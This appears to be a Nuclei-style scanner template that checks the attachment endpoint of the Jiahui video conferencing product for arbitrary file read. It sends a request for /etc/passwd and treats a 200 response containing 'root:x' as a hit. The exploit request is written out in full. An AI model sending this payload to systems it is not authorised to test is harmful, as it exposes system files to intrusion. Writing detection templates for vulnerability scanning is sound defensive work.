http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - root:x
            - /bin/bash
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /attachment?file=/etc/passwd HTTP/1.1
          Host: {{Hostname}}
id: jiahuivideo-File-reading
info:
    author: Superhero
    description: 佳会视频会议 attachment存在任意文件读取漏洞
    name: 佳会视频会议 attachment 任意文件读取漏洞
    severity: medium
    tags:
        - File reading
